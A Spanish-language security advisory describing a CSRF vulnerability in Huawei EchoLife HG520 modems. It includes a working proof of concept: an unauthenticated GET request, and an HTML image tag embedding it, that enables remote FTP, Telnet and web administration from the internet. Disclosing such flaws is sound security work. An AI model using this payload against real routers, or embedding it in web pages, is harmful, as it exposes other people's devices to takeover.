=========================================
        HUAWEI ECHOLIFE HG520 RemoteManagement CSRF
         =========================================


Dispositivo:            Huawei EchoLife HG520
Version de Software:    V100R001B021Telmex
                        V100R001B020Telmex
Version de Firmware:    3.10.18.7-1.0.7.0 (ultima version)
                        3.10.18.5-1.0.7.0
Modelos Vulnerables:    HG520c
                        HG520b
Fecha de publicacion:   2010-05-29
Criticidad:             Alto
Impacto:                Habilita la interfaz de administracion remota en la WAN
Ubicacion:              En la interfaz de administracion web (LAN/WAN)
Solucion:               No existe solucion disponible en este momento
Websec-id:              ws10-12


  DESCRIPCION
=======================
Los modems HG520 publican una interfaz de administracion via web en la red local. Las paginas '/Forms/access_cwmp_1', '/Forms/rpQos_1' y '/Forms/rpRManage_1' no requieren autenticacion, se puede realizar un ataque de CSRF para habilitar el acceso a las interfaces de administracion desde internet.


  EXPLOIT / POC
=======================
Se habilita el acceso remoto por FTP, TELNET y WEB mandando una peticion GET a:

  http://192.168.1.254/Forms/rpRManage_1?ACL_active=0

Se podria usar Client-Side visitando una pagina que contenga:

  <IMG SRC=http://192.168.1.254/Forms/rpRManage_1?ACL_active=0>


  SOLUCION
=======================
No existe parche o solucion disponible en este momento.


  DISCLOSURE TIMELINE
=======================
2010/03/20 - Vulnerability discovered


  REFERENCES
=======================
Hakim.Ws - http://www.hakim.ws
Websec - http://websec.mx


Websec.mx